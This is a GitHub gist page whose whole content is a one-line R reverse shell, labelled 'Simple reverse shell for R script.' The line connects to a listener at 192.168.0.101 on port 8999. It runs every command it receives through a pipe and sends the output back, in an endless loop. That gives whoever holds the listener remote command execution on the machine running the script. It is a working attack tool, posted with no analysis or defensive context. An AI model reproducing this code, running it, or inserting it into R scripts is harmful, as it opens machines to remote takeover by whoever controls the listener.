Skip to content

Instantly share code, notes, and snippets.

@DaveYesland
Created April 6, 2019 20:41
Show Gist options
  • Save DaveYesland/0945ca05afa5216652cd71930eb8ead1 to your computer and use it in GitHub Desktop.
Save DaveYesland/0945ca05afa5216652cd71930eb8ead1 to your computer and use it in GitHub Desktop.
Simple reverse shell for R script.
c<-socketConnection(host="192.168.0.101",8999,blocking=TRUE,timeout=1000000);while(TRUE){writeLines(readLines(pipe(readLines(c,1))),c)}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment